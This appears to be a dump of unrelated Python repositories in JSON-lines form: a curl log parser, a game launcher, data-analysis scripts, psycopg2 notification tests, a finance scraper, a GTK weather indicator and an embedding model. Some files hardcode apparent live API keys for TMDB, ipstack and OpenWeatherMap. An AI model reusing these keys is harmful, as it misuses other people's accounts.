['...']\n else:\n data_repr = self.data\n else:\n data_repr = self.data\n return \"Event {datetime=%s, event=%s, data=%s}\" % \\\n (self.datetime, self.event, data_repr)\n else:\n return \"Event {datetime=%s, event=%s}\" % (self.datetime, self.event)\n\n def __repr__(self):\n return unicode(self)\n\n\nclass CurlOutputParser(object):\n tokens = CurlOutputLexer.tokens\n\n @classmethod\n def p_log_data_more(cls, p):\n 'log_data : log_datum log_data'\n p[0] = [p[1]] + p[2]\n\n @classmethod\n def p_log_data_finished(cls, p):\n 'log_data : '\n p[0] = []\n\n @classmethod\n def p_log_datum_connecting(cls, p):\n 'log_datum : TIMESTAMP CONNECTING'\n p[0] = Event(datetime_obj=p[1], event=\"connecting\", data=p[2])\n\n @classmethod\n def p_log_datum_connecting_ip(cls, p):\n 'log_datum : TIMESTAMP CONNECTING_IP'\n p[0] = Event(datetime_obj=p[1], event=\"connecting_ip\", data=p[2])\n\n @classmethod\n def p_log_datum_connected_hostname_ip_port(cls, p):\n 'log_datum : TIMESTAMP CONNECTED_HOSTNAME_IP_PORT'\n p[0] = Event(datetime_obj=p[1], event=\"connected_hostname_ip_port\", data=p[2])\n\n @classmethod\n def p_log_datum_closing_connection(cls, p):\n 'log_datum : TIMESTAMP CLOSING_CONNECTION'\n p[0] = Event(datetime_obj=p[1], event=\"closing_connection\")\n\n @classmethod\n def p_log_datum_send_header(cls, p):\n 'log_datum : TIMESTAMP SEND_HEADER data'\n p[0] = Event(datetime_obj=p[1], event='send_header', data=p[3])\n\n @classmethod\n def p_log_datum_recv_header(cls, p):\n 'log_datum : TIMESTAMP RECV_HEADER data'\n p[0] = Event(datetime_obj=p[1], event='recv_header', data=p[3])\n\n @classmethod\n def p_log_datum_redirect(cls, p):\n 'log_datum : TIMESTAMP REDIRECT'\n p[0] = Event(datetime_obj=p[1], event='redirect', data=p[2])\n\n @classmethod\n def p_log_datum_ssl_client_hello(cls, p):\n 'log_datum : TIMESTAMP SSL_CLIENT_HELLO'\n p[0] = Event(datetime_obj=p[1], event=\"ssl_client_hello\")\n\n @classmethod\n def p_log_datum_ssl_server_hello(cls, p):\n 'log_datum : TIMESTAMP SSL_SERVER_HELLO'\n p[0] = Event(datetime_obj=p[1], event=\"ssl_server_hello\")\n\n @classmethod\n def p_log_datum_ssl_finished(cls, p):\n 'log_datum : TIMESTAMP SSL_FINISHED'\n p[0] = Event(datetime_obj=p[1], event=\"ssl_finished\")\n\n @classmethod\n def p_log_datum(cls, p):\n 'log_datum : TIMESTAMP'\n\n # Return None; this will still be present in the parse output but\n # we exclude it when returning to the caller.\n pass\n\n @classmethod\n def p_data_more(cls, p):\n 'data : data DATA'\n p[0] = p[1] + [p[2]]\n\n @classmethod\n def p_data_finished(cls, p):\n 'data : '\n p[0] = []\n\n @classmethod\n def p_error(cls, p):\n \"\"\"On an error restart the parser at the next timestamp.\n\n We can't predict everything that curl may print out, but at least\n with trace mode we know that lines will be prepended by timestamps.\"\"\"\n while True:\n token = yacc.token()\n if not token or token.type == \"TIMESTAMP\":\n break\n yacc.errok()\n return token\n\n @classmethod\n def build(cls):\n parser = yacc.yacc(module=cls)\n return parser\n\n @classmethod\n def parse(parser_cls, text, lexer_cls=CurlOutputLexer):\n lexer = lexer_cls.build()\n parser = parser_cls.build()\n parse = [elem for elem in parser.parse(text, lexer) if elem is not None]\n parse = parser_cls.collapse_recv_headers(parse)\n return parse\n\n @classmethod\n def collapse_recv_headers(cls, parse):\n \"\"\"Collapse multiple RECV_HEADER events into one event, with the datetime\n set to when the first header was received.datetime\n\n I couldn't figure out how to come up with a grammar without shift/reduce\n conflicts to do this, so we do it here.\"\"\"\n \n output = []\n in_block = False\n current_block = []\n for elem in parse:\n if elem.event != 'recv_header':\n if in_block:\n all_data = [block_elem.data[0] for block_elem in current_block]\n new_event = Event(datetime_obj=current_block[0].datetime,\n event=\"recv_header\",\n data=all_data)\n output.append(new_event)\n current_block = []\n in_block = False\n output.append(elem)\n continue\n in_block = True\n current_block.append(elem)\n return output\n","repo_name":"asimihsan/webopticon","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30879785949","text":"from ursina import *\r\ndef v100():\r\n application.development_mode = False\r\n game100 = Ursina()\r\n window.exit_button.enabled = False\r\n window.cog_button.enabled = False\r\n window.fps_counter.enabled = False\r\n window.borderless = False\r\n window.fullscreen = True\r\n game100.run()\r\ndef launcher():\r\n #try:\r\n import os\r\n import ctypes\r\n from zipfile import ZipFile\r\n os.system('cls')\r\n ctypes.windll.kernel32.SetConsoleTitleW(\"ExCraft\")\r\n print(\"ExCraft Launcher 1.0.0\\nVeress Bence Gyula - 2021\\n\")\r\n exdir = \"C:\\Ex\"\r\n appdir = \"C:\\Ex\\ExCraft\"\r\n verdir = \"C:\\Ex\\ExCraft\\\\1.0.0\"\r\n datadir = \"C:\\Ex\\ExCraft\\\\1.0.0\\data\"\r\n if not os.path.exists(exdir):\r\n os.mkdir(exdir)\r\n print(\"Directory created: \" + exdir)\r\n if not os.path.exists(appdir):\r\n os.mkdir(appdir)\r\n print(\"Directory created: \" + appdir)\r\n if not os.path.exists(verdir):\r\n os.mkdir(verdir)\r\n print(\"Directory created: \" + verdir)\r\n if not os.path.exists(datadir):\r\n os.mkdir(datadir)\r\n print(\"Directory created: \" + datadir)\r\n if not (os.path.exists(\"C:\\Ex\\ExCraft\\\\1.0.0\\data\\data.excraft\")):\r\n usernamef = open(\"C:\\Ex\\ExCraft\\\\1.0.0\\data\\data.excraft\",\"w\")\r\n usernamei = input(\"\\nEnter a username: \")\r\n usernamef.write(usernamei)\r\n usernamef.close()\r\n print(\"\\nExCraft setup completed!\\nPress any key to restart ExCraft!\")\r\n input()\r\n launcher()\r\n usernamef = open(\"C:\\Ex\\ExCraft\\\\1.0.0\\data\\data.excraft\",\"r\")\r\n linec = 0\r\n for line in usernamef:\r\n linec += 1\r\n if (linec == 1):\r\n username = line\r\n try:\r\n print(\"Welcome \" + username + \"!\")\r\n except UnboundLocalError:\r\n username = \"Player\"\r\n print(\"Welcome \" + username + \"!\")\r\n print(\"Available versions:\\n\")\r\n print(\" 1.0.0 - 2021.11.27\")\r\n print(\"\\nType which version do you want to play!\")\r\n verselect = input(\"Selection: \")\r\n if (verselect == \"1.0.0\"):\r\n v100()\r\n else:\r\n print(\"Invalid version!\\nPress any key to retry!\")\r\n input()\r\n launcher()\r\n #except:\r\n #print(\"\\nPY: ERROR\\nPress any key to continue!\")\r\n #input()\r\nlauncher()","repo_name":"VBence2008/Discontinued","sub_path":"ExCraft/1.0.0/ExCraft.py","file_name":"ExCraft.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28624215660","text":"import pickle\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib.mlab import PCA\nfrom scipy.spatial import distance\nimport scipy.cluster.hierarchy as sch\nfrom scipy.spatial.distance import squareform\nimport seaborn as sns\nfrom scipy.signal import correlate,correlate2d\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.mplot3d import proj3d\nfrom sklearn import manifold\nfrom sklearn.metrics import euclidean_distances\n# from sklearn.decomposition import PCA\nfrom scipy.stats import zscore\nfrom moran_lab.band_pass_filters import savitzky_golay\n\ndef calc_batch_times(taste_events):\n diffs = taste_events[1:] - taste_events[:-1]\n change_locs = np.array(np.where(diffs > 300)) + 1\n return taste_events[change_locs[0]]\n\ndef split_event_times_by_batches(event_times, batch_times):\n mat = []\n previous = 0\n for current in batch_times:\n this_batch_times = [i for i in event_times if previous < i < current]\n mat.append(this_batch_times)\n previous = current\n last_batch = [i for i in event_times if previous < i]\n mat.append(last_batch)\n return mat\n\ndef get_spikes_in_time_frame(ST,start,stop):\n return np.array([i for i in ST if start0:\n lyric_search=\"Lyrics[no='%d']\" % loop\n chord_lyric=self.getvalue(chord,lyric_search+\"/text\")\n if not(chord_lyric is None):\n syllabic=self.getvalue(chord,lyric_search+\"/syllabic\")\n sep = \"-\" if (syllabic==\"begin\" or syllabic==\"middle\") else \" \"\n lyrics=self.addLyric(mystaff,lyrics,chord_lyric,sep)\n for i in range(len(mychord)):\n mystaff[i]+=mychord[i]\n self.fixLength(mystaff,lyrics)\n \n if len(mystaff[0])+len(self.output_staff[0])>=110: self.dumpstaff()\n self.addMeasure(mystaff,lyrics)\n rpt=measure.find(\"endRepeat\")\n if not(rpt is None):\n rptcount=int(rpt.text)\n if (loop80:\n self.addln(chords)\n self.addln(lyrics)\n lyrics=\"\"\n chords=\"\"\n self.addln(chords)\n self.addln(lyrics)\n \n\n def getStaffName(self,staff):\n id=staff.attrib['id']\n #track=self.root.find('./Score/Part[Staff[@id=\"'+id+'\"]]/trackName')\n track=self.root.find('./Score/Part/Staff[@id=\"'+id+'\"]/../trackName')\n name=id+\" \"+track.text if not(track is None) else str(id)\n return name\n\n def getChordName(self,harmony):\n croot=self.getvalue(harmony,\"root\")\n cname=self.getvalue(harmony,\"name\")\n if cname is None: cname=\"\"\n if croot is None:\n return \"\"\n else:\n chordnames={8:\"Gb\",9:\"Db\",10:\"Ab\",11:\"Eb\",12:\"Bb\",13:\"F\",14:\"C\",15:\"G\",16:\"D\",17:\"A\",18:\"E\",19:\"B\",20:\"F#\",21:\"C#\",22:\"G#\"}\n nroot=int(croot)\n if nroot in chordnames:\n croot=chordnames[nroot]\n return croot+cname\n \n def dumpstaff(self):\n strings = ['A','E','C','G']\n for i in range(len(self.output_staff)):\n self.addln(strings[i]+self.output_staff[i]+\"|\")\n self.output_staff[i]=\"\"\n if len(self.output_lyrics)>0:\n self.addln(\" \"+self.output_lyrics)\n self.output_lyrics=\"\"\n self.addln()\n \n def fillnote(self,value,duration):\n ln=max((self.calclength(duration)-self.minlen)+1,1)\n result=value\n while len(result)=X:\n count+=1\n else:\n break\n if count==M:\n flag=True\n before_price=min(price, before_price)\nif flag==False:\n print(-1)\nelse:\n print(before_price)\n\n\n\n","repo_name":"umzw/AtCoder","sub_path":"167 C- Skill Up.py","file_name":"167 C- Skill Up.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"811988145","text":"# A, B, and C are three sides of a triangle\n\n# s = A + B + C / 2\n\n# area =√(s(s-a)*(s-b)*(s-c))\n\n# to find the area of the triangle\n# a = 5\n# b = 3\n# c = 5\n\n# Take inputs from the user\na = float(input(\"Enter first side: \"))\nb = float(input(\"Enter second side: \"))\nc = float(input(\"Enter third side: \"))\n\n\n# calculate the semi-perimeter\ns = (a + b + c) / 2\n\n# calculate the area of the triangle\narea = (s*(s-a)*(s-b)*(s-c)) ** 0.5\n\nprint(f'The area of the triangle is {area}')\n","repo_name":"Nikhil235/Python","sub_path":"Intoduction/area_of_triangle.py","file_name":"area_of_triangle.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5562323702","text":"# coding=utf-8\n# encoding=utf-8\nfrom pymongo import MongoClient\n\n\nclass DataPersistence(object):\n conn = MongoClient('localhost', 27017)\n db = conn.law\n collection = db.law1\n\n def save(self, dic):\n try:\n self.collection.save(dic)\n print ('数据插入成功')\n except Exception as e:\n print (e)\n\n def search(self):\n try:\n result = self.collection.find()\n print (result)\n except Exception as e:\n print(e)","repo_name":"mayJJ/lawyer","sub_path":"DataPersistence.py","file_name":"DataPersistence.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37168551271","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io\nimport pickle\n\nmat = scipy.io.loadmat('mnist_small.mat')\n\nK = 2\nD = 784\nN = 10000\n\nX = mat['X'] #N*D matrix\nZ = np.random.rand(N,K) #N*K matrix,initialize with random values\nW = np.zeros((D,K)) #D*K matrix\nprint(X.shape)\nprint(Z.shape)\nprint(W.shape)\n\nnum_iterations = 0\nwhile(num_iterations<500):\n\tW = (np.dot(np.linalg.inv(np.dot(Z.T,Z)),np.dot(Z.T,X))).T\n\tZ = np.dot(np.dot(X,W),np.linalg.inv(np.dot(W.T,W)))\n\tnum_iterations += 1\n\n\nf = open(b\"embeddings_pca.obj\",\"wb\")\npickle.dump(Z,f)\n","repo_name":"aman9875/cs771","sub_path":"assignment 4/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"23689292142","text":"from libcloud.storage.types import Provider\nfrom libcloud.storage.providers import get_driver\n\nFILE_PATH = \"/home/user/myfile.tar.gz\"\n\ncls = get_driver(Provider.SCALEWAY)\n\ndriver = cls(\"api key\", \"api secret key\", region=\"fr-par\")\n\ncontainer = driver.get_container(container_name=\"\")\n\nextra = {\n \"meta_data\": {\"owner\": \"myuser\", \"created\": \"2001-05-25\"},\n \"acl\": \"public-read\",\n}\n\nwith open(FILE_PATH, \"rb\") as iterator:\n obj = driver.upload_object_via_stream(\n iterator=iterator, container=container, object_name=\"backup.tar.gz\", extra=extra\n )\n","repo_name":"apache/libcloud","sub_path":"docs/examples/storage/scaleway/upload_example.py","file_name":"upload_example.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":1969,"dataset":"github-code","pt":"37"} +{"seq_id":"71779199787","text":"#!/usr/bin/env python\nimport unittest\nimport warnings\n\nimport psycopg2\nfrom psycopg2 import extensions\n\nimport time\nimport select\nimport signal\nfrom subprocess import Popen, PIPE\n\nimport sys\nif sys.version_info < (3,):\n import tests\nelse:\n import py3tests as tests\n\n\nclass NotifiesTests(unittest.TestCase):\n\n def setUp(self):\n self.conn = psycopg2.connect(tests.dsn)\n\n def tearDown(self):\n self.conn.close()\n\n def autocommit(self, conn):\n \"\"\"Set a connection in autocommit mode.\"\"\"\n conn.set_isolation_level(extensions.ISOLATION_LEVEL_AUTOCOMMIT)\n\n def listen(self, name):\n \"\"\"Start listening for a name on self.conn.\"\"\"\n curs = self.conn.cursor()\n curs.execute(\"LISTEN \" + name)\n curs.close()\n\n def notify(self, name, sec=0, payload=None):\n \"\"\"Send a notification to the database, eventually after some time.\"\"\"\n if payload is None:\n payload = ''\n else:\n payload = \", %r\" % payload\n\n script = (\"\"\"\\\nimport time\ntime.sleep(%(sec)s)\nimport psycopg2\nimport psycopg2.extensions\nconn = psycopg2.connect(%(dsn)r)\nconn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\nprint conn.get_backend_pid()\ncurs = conn.cursor()\ncurs.execute(\"NOTIFY \" %(name)r %(payload)r)\ncurs.close()\nconn.close()\n\"\"\"\n % { 'dsn': tests.dsn, 'sec': sec, 'name': name, 'payload': payload})\n\n return Popen([sys.executable, '-c', script], stdout=PIPE)\n\n def test_notifies_received_on_poll(self):\n self.autocommit(self.conn)\n self.listen('foo')\n\n proc = self.notify('foo', 1)\n\n t0 = time.time()\n ready = select.select([self.conn], [], [], 5)\n t1 = time.time()\n self.assert_(0.99 < t1 - t0 < 4, t1 - t0)\n\n pid = int(proc.communicate()[0])\n self.assertEqual(0, len(self.conn.notifies))\n self.assertEqual(extensions.POLL_OK, self.conn.poll())\n self.assertEqual(1, len(self.conn.notifies))\n self.assertEqual(pid, self.conn.notifies[0][0])\n self.assertEqual('foo', self.conn.notifies[0][1])\n\n def test_many_notifies(self):\n self.autocommit(self.conn)\n for name in ['foo', 'bar', 'baz']:\n self.listen(name)\n\n pids = {}\n for name in ['foo', 'bar', 'baz', 'qux']:\n pids[name] = int(self.notify(name).communicate()[0])\n\n self.assertEqual(0, len(self.conn.notifies))\n self.assertEqual(extensions.POLL_OK, self.conn.poll())\n self.assertEqual(3, len(self.conn.notifies))\n\n names = dict.fromkeys(['foo', 'bar', 'baz'])\n for (pid, name) in self.conn.notifies:\n self.assertEqual(pids[name], pid)\n names.pop(name) # raise if name found twice\n\n def test_notifies_received_on_execute(self):\n self.autocommit(self.conn)\n self.listen('foo')\n pid = int(self.notify('foo').communicate()[0])\n self.assertEqual(0, len(self.conn.notifies))\n self.conn.cursor().execute('select 1;')\n self.assertEqual(1, len(self.conn.notifies))\n self.assertEqual(pid, self.conn.notifies[0][0])\n self.assertEqual('foo', self.conn.notifies[0][1])\n\n def test_notify_object(self):\n self.autocommit(self.conn)\n self.listen('foo')\n self.notify('foo').communicate()\n self.conn.poll()\n notify = self.conn.notifies[0]\n self.assert_(isinstance(notify, psycopg2.extensions.Notify))\n\n def test_notify_attributes(self):\n self.autocommit(self.conn)\n self.listen('foo')\n pid = int(self.notify('foo').communicate()[0])\n self.conn.poll()\n self.assertEqual(1, len(self.conn.notifies))\n notify = self.conn.notifies[0]\n self.assertEqual(pid, notify.pid)\n self.assertEqual('foo', notify.channel)\n self.assertEqual('', notify.payload)\n\n def test_notify_payload(self):\n if self.conn.server_version < 90000:\n warnings.warn(\"server version %s doesn't support notify payload: skipping test\"\n % self.conn.server_version)\n return\n self.autocommit(self.conn)\n self.listen('foo')\n pid = int(self.notify('foo', payload=\"Hello, world!\").communicate()[0])\n self.conn.poll()\n self.assertEqual(1, len(self.conn.notifies))\n notify = self.conn.notifies[0]\n self.assertEqual(pid, notify.pid)\n self.assertEqual('foo', notify.channel)\n self.assertEqual('Hello, world!', notify.payload)\n\n def test_notify_init(self):\n n = psycopg2.extensions.Notify(10, 'foo')\n self.assertEqual(10, n.pid)\n self.assertEqual('foo', n.channel)\n self.assertEqual('', n.payload)\n (pid, channel) = n\n self.assertEqual((pid, channel), (10, 'foo'))\n\n n = psycopg2.extensions.Notify(42, 'bar', 'baz')\n self.assertEqual(42, n.pid)\n self.assertEqual('bar', n.channel)\n self.assertEqual('baz', n.payload)\n (pid, channel) = n\n self.assertEqual((pid, channel), (42, 'bar'))\n\n def test_compare(self):\n data = [(10, 'foo'), (20, 'foo'), (10, 'foo', 'bar'), (10, 'foo', 'baz')]\n for d1 in data:\n for d2 in data:\n n1 = psycopg2.extensions.Notify(*d1)\n n2 = psycopg2.extensions.Notify(*d2)\n self.assertEqual((n1 == n2), (d1 == d2))\n self.assertEqual((n1 != n2), (d1 != d2))\n\n def test_compare_tuple(self):\n from psycopg2.extensions import Notify\n self.assertEqual((10, 'foo'), Notify(10, 'foo'))\n self.assertEqual((10, 'foo'), Notify(10, 'foo', 'bar'))\n self.assertNotEqual((10, 'foo'), Notify(20, 'foo'))\n self.assertNotEqual((10, 'foo'), Notify(10, 'bar'))\n\n def test_hash(self):\n from psycopg2.extensions import Notify\n self.assertEqual(hash((10, 'foo')), hash(Notify(10, 'foo')))\n self.assertNotEqual(hash(Notify(10, 'foo', 'bar')),\n hash(Notify(10, 'foo')))\n\ndef test_suite():\n return unittest.TestLoader().loadTestsFromName(__name__)\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","repo_name":"Ademan/psycopg2","sub_path":"tests/test_notify.py","file_name":"test_notify.py","file_ext":"py","file_size_in_byte":6133,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"20956359739","text":"import re\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom time import sleep\nimport pandas as pd\nimport datetime\n\n# epoch timestamp: 1483228800\nstart_from = datetime.datetime(2017,1,1,8,0,0).strftime('%s') \n\ngafata = ['^GSPC', 'GOOG', 'AAPL', 'FB', 'AMZN', '0700.HK', 'BABA']\nsource_data_path = \"/Users/data/\"\n\nchrome_options = Options()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--disable-gpu')\n# 设置下载地址\nprefs = {'profile.default_content_settings.popups': 0, 'download.default_directory': f'{source_data_path}'}\nchrome_options.add_experimental_option('prefs', prefs)\n\ndriver = webdriver.Chrome('/Users/hantao/Documents/践行群内容/extract-python/chromedriver', options = chrome_options)\n\ndriver = webdriver.Chrome('/usr/local/bin/chromedriver', options = chrome_options)\n\n# get all csv files\ndriver.get(f'https://finance.yahoo.com/quote/{gafata[0]}/history')\nsleep(5)\n\ndownload_link = driver.find_element_by_xpath(\"// a[. // span[text() = 'Download Data']]\").get_attribute(\"href\")\nfor symbol in gafata:\n period1_changed = re.sub(r'period1=(\\d+)', 'period1=1483228800', download_link)\n # if interval=1d, then stocks from various global exchanges would not align to each other in terms of date.\n interval_changed = re.sub(r'interval=(.*)&', 'interval=1wk&', period1_changed)\n dataURL = re.sub(r'download\\/.*\\?', f'download/{symbol}?', interval_changed)\n driver.get(dataURL)\n # 避免文件还没生成就解析文件\n sleep(5)\n\n","repo_name":"sodexx7/extract-histical-data-from-yahoo-finance","sub_path":"gafat_extract.py","file_name":"gafat_extract.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"12406598398","text":"import requests\n\ntmdb_api_key = \"8c0bf74f3e2ad8fde17e6070d4058723\"\nsearch_movie_url = \"https://api.themoviedb.org/3/search/movie\"\nmovie_image_url = \"https://image.tmdb.org/t/p/w500\"\n\n# params = {\n# \"api_key\": tmdb_api_key,\n# \"query\": \"phone booth\"\n# }\n#\n# response = requests.get(url=search_movie_url, params=params)\n# data = response.json()[\"results\"]\n# print(data)\n\n# for x in data:\n# print(f\"{x['title']} - {x['release_date']}\")\n\n\nresponse = requests.get(url=\"https://api.themoviedb.org/3/movie/1817\", params={\"api_key\": tmdb_api_key})\ndata = response.json()\n# print(data)\n\nmovie = {\n \"title\": data[\"title\"],\n \"year\": data[\"release_date\"].split(\"-\")[0],\n \"img_url\": movie_image_url + data[\"poster_path\"],\n \"description\": data[\"overview\"]\n}\n\nprint(movie)\n\n\n\n\n","repo_name":"developer-aaronlee/flask-my-top10-movies","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42507910905","text":"class User:\n def __init__(self, name, id):\n self.name = name\n self.id = id\n self.followers = 0\n self.following = 0\n \n def follow(self, user):\n user.followers += 1\n self.following += 1\n\n\nuser1 =User(\"Param\", 1)\nuser2 =User(\"Anjali\", 2)\n\nprint(user1.name)\n\nprint(user1.followers)\nuser1.follow(user2)\nprint(user1.followers)","repo_name":"Paramvir12121/100-Days_of_Python-Beginner","sub_path":"day17_quiz/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41313488877","text":"#!/usr/bin/env python3\nimport signal\nimport os\nimport requests\nimport gi\ngi.require_version('Gtk', '3.0')\ngi.require_version('AppIndicator3', '0.1')\nfrom gi.repository import Gtk as gtk\nfrom gi.repository import AppIndicator3 as appindicator\nfrom gi.repository import GLib as glib\n\n\nAPPINDICATOR_ID = 'myappindicator'\nREPEAT_TIME_MS = 30000\nKELVINTOCELSIUS = 273.16\n\n\nclass WeatherIndicator:\n attributes_prefix = ['', 'Sky: ', 'Temperature: ', 'Pressure: ', 'Humidity: ', 'Wind Speed: ']\n\n def __init__(self, name=None, icon=None):\n self.path = os.path.abspath(os.path.dirname(__file__))\n\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n\n if name is None:\n self.name = \"WeatherIndicator\"\n else:\n self.name = name\n\n if icon is None:\n self.icon = gtk.STOCK_INFO\n else:\n self.icon = icon\n\n self.indicator = appindicator.Indicator.new(\n self.name, self.icon,\n appindicator.IndicatorCategory.SYSTEM_SERVICES\n )\n self.indicator.set_status(appindicator.IndicatorStatus.ACTIVE)\n\n weather_data, icon_path = self.get_weather_data_from_request()\n menu, menu_items_to_update = self.build_menu(weather_data)\n\n self.indicator.set_menu(menu)\n self.indicator.set_label(weather_data[2], \"\")\n self.indicator.set_icon(icon_path)\n\n glib.timeout_add(REPEAT_TIME_MS, self.update_indicator, menu_items_to_update)\n gtk.main()\n\n @staticmethod\n def get_ip_from_request():\n raw_json = requests.get('https://ifconfig.co/json').json()\n ip = raw_json['ip']\n return ip\n\n @staticmethod\n def get_location_from_request(ip_address):\n api_address = 'http://api.ipstack.com/'\n personal_api_key = '8810a19a176c8c056a47d73fdd70e70f'\n url = api_address + ip_address + '?access_key=' + personal_api_key\n raw_json_data = requests.get(url).json()\n country = raw_json_data['country_name']\n city = raw_json_data['city']\n if city is None:\n city = raw_json_data['location']['capital']\n\n return city, country\n\n def get_weather_data_from_request(self):\n try:\n host_ip = self.get_ip_from_request()\n except:\n print(\"Unable to get ip from request\")\n\n city, country = self.get_location_from_request(host_ip)\n api_address = 'http://api.openweathermap.org/data/2.5/weather?appid=ca428a05cb62822c904d1abb2257ba16&q='\n url = api_address + city\n location = city + ', ' + country\n raw_data_from_api = requests.get(url).json()\n sky = raw_data_from_api['weather'][0]['main']\n temperature = round(raw_data_from_api['main']['temp'] - KELVINTOCELSIUS, 1)\n temperature = str(temperature) + ' °C'\n pressure = raw_data_from_api['main']['pressure']\n pressure = str(pressure) + ' hPa'\n humidity = raw_data_from_api['main']['humidity']\n humidity = str(humidity) + ' %'\n wind_speed = raw_data_from_api['wind']['speed']\n wind_speed = str(wind_speed) + ' m/s'\n icon_path = os.path.dirname(os.path.realpath(__file__)) + \"/icons/\" + raw_data_from_api['weather'][0][\n 'icon'] + \".png\"\n weather_data = [location, sky, temperature, pressure, humidity, wind_speed]\n return weather_data, icon_path\n\n def build_menu(self, attributes):\n menu = gtk.Menu()\n\n menu_items = []\n for i in range(0, len(attributes)):\n new_item = gtk.MenuItem(self.attributes_prefix[i] + attributes[i])\n menu.append(new_item)\n menu_items.append(new_item)\n\n item_quit = gtk.MenuItem('Quit')\n item_quit.connect('activate', quit)\n menu.append(item_quit)\n menu.show_all()\n\n return menu, menu_items\n\n def update_indicator(self, menu_items):\n try:\n weather_data, icon_path = self.get_weather_data_from_request()\n self.indicator.set_label(weather_data[2], \"\")\n self.indicator.set_icon(icon_path)\n for i in range(0, len(weather_data)):\n menu_items[i].set_label(self.attributes_prefix[i] + weather_data[i])\n\n print(weather_data[2])\n except:\n print(\"Weather not updated.\")\n\n return True\n\n\nif __name__ == \"__main__\":\n weatherIndicator = WeatherIndicator('Weather indicator', os.path.dirname(os.path.realpath(__file__)) + \"/icons/contrast.png\")\n","repo_name":"wjcwleklinski/WeatherPanelIndicator","sub_path":"weather_indicator.py","file_name":"weather_indicator.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20525946293","text":"import torch\nfrom torch import nn\n\n\nclass HarmonNet(nn.Module):\n def __init__(self, no_entities, no_relationships, device, encoding_dim=10, lambda_=1.,):\n super().__init__()\n torch.manual_seed(42)\n self.NO_ENTITIES = no_entities\n self.NO_RELATIONSHIPS = no_relationships\n self.ENCODING_DIM = encoding_dim\n self.entities_embedding = nn.Embedding(no_entities, encoding_dim)\n self.relation_embedding = nn.Embedding(no_relationships, encoding_dim)\n self.W = torch.nn.Parameter(torch.rand(self.ENCODING_DIM, self.ENCODING_DIM))\n self.lambda_ = lambda_\n self.b = torch.nn.Parameter(torch.rand(self.ENCODING_DIM, requires_grad=True))\n self.rnn = torch.nn.RNN(input_size=encoding_dim, hidden_size=1, num_layers=1, nonlinearity='relu')\n self.loss_func = torch.nn.LogSoftmax(dim=1)\n self.device = device\n\n def loss(self, y_pred):\n \"\"\"\n compute the batch loss\n \"\"\"\n softmax = -self.loss_func(y_pred)\n result = torch.sum(softmax[:, 0])\n return result\n\n def forward(self, samples):\n \"\"\"\n Deal with a single train item -> batch\n samples [(e1,r,e2), ...]\n \"\"\"\n e1s, rs, e2s = samples[:, :, 0], samples[:, :, 1], samples[:, :, 2]\n # assert e1s.shape == (samples.shape[0], samples.shape[1])\n entity_1 = self.entities_embedding(e1s)\n entity_2 = self.entities_embedding(e2s)\n r = self.relation_embedding(rs)\n x = self.harmonic_holograhpic_embedding(entity_1, r, entity_2)\n batch_result = self.score(x)\n return batch_result\n\n def harmonic_holograhpic_embedding(self, e1, r, e2):\n return r * self._circular_correl(e1, e2)\n\n def _circular_correl(self, e1, e2):\n ccorel = torch.irfft(torch.conj(torch.rfft(e1, 1, onesided=False)) * torch.rfft(e2, 1, onesided=False),\n 1, onesided=False)\n return ccorel\n\n def _2d_norm_batch(self, x):\n \"\"\"\n norm based on last dimension\n \"\"\"\n result = torch.einsum('...k,...k', x, x)\n return result\n\n def H(self, h, x):\n diff = h - x\n Wsym = (self.W + self.W.t()).to(self.device)\n hW = torch.einsum('...ij,jk', h, Wsym)\n result = torch.einsum('ijk,ikj->ij', hW, h.transpose(1, 2)) + \\\n torch.einsum('...k,k', h, self.b) - \\\n self.lambda_ * self._2d_norm_batch(diff)\n # assert result.shape == torch.Size([x.shape[0], x.shape[1]])\n return result\n\n def muy(self, x):\n Wsym = self.W + self.W.t()\n V = Wsym - (self.lambda_ * torch.eye(self.ENCODING_DIM)).to(self.device)\n V = V.inverse()\n r = torch.einsum('ijk,kt', -0.5 * self.b + self.lambda_ * x, V)\n # assert r.shape == x.shape\n # for i in range(x.shape[0]):\n # assert (-0.5 * self.b + self.lambda_ * x[i]).mm(V).allclose(r[i],atol=3e-7)\n return r\n\n def score(self, x):\n return self.H(self.muy(x), 